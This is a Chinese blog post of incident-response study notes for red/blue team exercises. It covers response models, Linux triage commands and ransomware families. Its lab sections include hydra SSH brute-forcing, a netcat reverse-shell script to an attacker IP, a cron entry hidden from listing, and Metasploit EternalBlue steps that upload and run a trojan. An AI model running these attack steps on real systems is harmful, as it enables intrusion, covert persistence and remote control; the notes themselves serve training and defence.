护网行动学习笔记
应急响应:
事件级别:
特别重大事件:红色预警、一级响应
重大事件:橙色预警、二级响应
较大事件:黄色预警、三级响应
一般事件:蓝色预警、四级响应
事件类型:
应用安全:webshell、网页篡改、网页挂马等
系统安全:勒索病毒、挖矿木马、远控后门等
批量攻击:0day、1day、漏洞
- 注:0day:未被公布的漏洞,官方未修复,未发布补丁
- 1day:已被公布的漏洞,没有补丁的一段较短的时间内
- nday:官方提供了补丁,但漏洞仍在被利用
网络安全:DDOS攻击、ARP攻击、流量劫持等
数据安全:数据的泄露、损坏、加密等
应急响应流程:
确定攻击时间:缩小应急响应范围,提高效率
查找攻击线索:查找攻击后果
梳理攻击流程:还原攻击流程
实施解决方案:修复漏洞,切断攻击途径
定位红方位置:溯源取证
应急响应模型:
准备阶段(Preparation):应急团队建设、应急方案制定、渗透测试评估、安全基线检查
检测阶段(Detection):判断事件类型、判断事件级别、确定应急方案
抑制阶段(Containment):限制攻击/破坏的范围,同时降低潜在损失
- 注:阻断:IP地址、网络连接、危险主机等
- 关闭:可疑进程、可疑服务等
- 删除:违规账号、危险文件等
根除阶段(Eradication):通过事件分析找出根源并彻底根除
- 注:增强:安全策略、全网监控等
- 修复:应用漏洞、系统漏洞、补丁更新等
- 还原:操作系统、业务系统等
恢复阶段(Recovery):恢复业务系统、恢复用户数据、恢复网络通信
总结阶段(Summarize):事件会议总结、响应报告输出、响应工作优化
团队组建:
内部团队:
监控组:利用各类监控系统监控、查看监控系统日志、对应用/系统/网络/数据安全检测
响应组:应用组、系统组、设备组
研判组:溯源分析、专家组
文档组:应急响应方案制定、事件报告输出、经验总结输出
外部团队:
合作单位:安全厂商、安全服务团队
监管单位:网信办、公安部
入侵排查:
系统排查、进程排查、服务排查、文件痕迹排查、日志分析、内存分析、流量分析、威胁情报
- 注:安全产品分类:美国分为九类:鉴别、访问控制、入侵检测、防火墙、公钥基础设施、恶意程序代码、防护、漏洞扫描、取证、介质清理或擦除
- 中国分为七类:操作系统安全、数据库安全、网络安全、病毒防护、访问控制、加密、鉴别
- 产品用途分类:安全网关类:防火墙、UTM、网闸、抗DDOS墙、VPN、上网行为管理
- 评估工具类:漏扫系统、网络分析系统
- 威胁管理:入侵检测系统(IDS)、入侵防御系统(IPS)、WAF
- 应用监管类:堡垒机、审计系统、终端安全管理系统、安全运维平台(SOC)
- 安全加密类:加密机、三合一
事件排查流程:
查看可疑链接:
netstat -antpl
查看进程树:
pstree -p
查看具体可疑进程:
systemctl status 可疑进程PID
查看计划任务:
cat -A /var/spool/cron/crontabs/root
查看可疑文件:
ls -l 可疑文件目录
查看可疑文件内容:
cat 可疑文件目录
查看登录成功日志:
last -f /var/log/wtmp
查看登录失败日志:
last -f /var/log/btmp
进入/tmp目录删除可疑文件:
rm 可疑文件文件名
总结:
爆破时间
爆破账户
攻击者ip
攻击结果
事件处置:
删除隐藏的计划任务
crontab -r -u 受攻击用户名
删除恶意进程:
kill 可疑进程PID
修改密码
passwd 受攻击用户名
修改PermitRootLogin为no关闭受攻击用户远程连接权限
vim /etc/ssh/sshd_config
修改ssh默认端口,并将#删除
vim /etc/ssh/sshd_config
SSH:
Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,在不安全的网络中为网络服务提供安全的传输环境,通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接
常见用途:远程登录系统,多用于类Unix系统
常用工具:MobaXterm
常见端口:22:ssh
445:smb ms17:010
3306:MySQL
3389:rdp远程桌面连接服务
80:http
443:https
模拟SSH爆破攻击:
攻击机:Everything kali Debian 11.x 64 138
靶机:Target kali Debian 11.x 64 135
信息收集:
使用nmap扫描目标主机的端口
nmap 靶机ip地址
发现开启了22号端口,尝试爆破
爆破SSH:
使用hydra进行爆破
hydra -L users.txt -P password.txt -vV ssh://靶机ip地址
- 注:撞库:A网站泄露的账密C通过爆破可以登录B网站
SSH登录:
ssh 用户名@靶机ip地址
- 注:@表示登录在
尝试创建隐藏计划任务:
创建shell反弹脚本:
进入/tmp目录
vim task.sh
#!/bin/bash
nc 攻击机ip地址 7777 -e /bin/bash查看文件操作权限
ls -l task.sh
使用命令调整文件操作权限
chmod +x task.sh
创建定时任务:
进入/tmp目录
vim create_task.sh
(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for`whoami`%100c\n")|crontab -使用命令调整文件操作权限
chmod +x create_task.sh
使用命令启动文件
./create_task.sh
尝试nc连接靶机shell:
nc -lvp 7777
- 注:创建计划任务:权限维持
勒索病毒:
电脑病毒,主要以邮件、程序木马、网页挂马等形式进行传播,性质恶劣危害巨大,通常使用对称与非对称加密算法组合的方式来加密文件,被感染者一般无法解密,无法溯源
常见勒索病毒:
WannaCry:常见后缀:wncry
传播方式:永恒之蓝漏洞
特征:启动时会链接一个不存在的URL,创建系统服务mssecsvc2.0,释放路径为windows目录,不会加密exe文件
Globelmposter:常见后缀:auchentoshan、动物名称+4444
传播方式:RDP暴力破解、钓鱼邮件、捆绑软件
特征:释放在%appdata%或%localappdata%
Crysis/Dharma:常见后缀:id+勒索邮箱+特定后缀
传播方式:RDP暴力破解
特征:勒索信位置在startup目录,样本位置在%windir%\System32、startup目录、%appdata%目录
GandCrab:常见后缀:随机生成
传播方式:RDP暴力破解、钓鱼邮件、捆绑邮件、僵尸网络、漏洞传播等
特征:样本执行完毕后自动删除,并会修改感染主机桌面背景,有后缀MANUAL.txt、DECRYPT.txt
解密方式:
1.入侵攻击者服务器获取非对称加密私钥,用非对称加密的私钥解密经过非对称加密公钥加密后的对称加密密钥,进而解密文件数据
2.勒索病毒加密算法设计存在问题,加密密钥存放在本地
3.暴力破解
4.支付赎金,下载特定的解密器
模拟WannaCry攻击流程:
启动msf:
msfconsole
搜索相关模块:
search ms17-010
使用永恒之蓝模块:
use exploit/windows/smb/ms17_010_eternalblue
设置相关参数:
options
set rhosts 靶机ip地址
开始攻击:
run
靶机目录下上传木马文件:
upload 木马文件目录
执行木马文件:
execute -f 木马文件名
应急响应:
事件判断:判断攻击事件危害等级,并启动对应应急响应措施
临时处置:断开网络
禁止使用移动存储设备
信息收集与分析:样本分析
进程信息、系统信息、日志、文件排查
事件处置:网络排查,查找恶意链接
netstat -ano
通过PID查看程序执行目录
wmic process where processid=PID get name,executablepath
使用微步在线查看可疑ip或域名
更新补丁
事件防御:事件抑制:隔离问题主机,断开网络连接,尽量关闭外部连接
将135、139、445端口关闭,封堵非业务端口
将服务器/主机密码全部更改为复杂的高强度密码
安装安全补丁,尤其是MS17-010漏洞的补丁
根除与恢复:终端安装企业级防病毒软件
使用流量监控设备进行内网流量监控
出口防火墙封堵可疑地址
数据备份
本文来自博客园,作者:{xXiAOxi},转载请注明原文链接:{https://www.cnblogs.com/bravexiaoxi/},仅作为学习参考记录和使用,请勿用于任何非法用途!
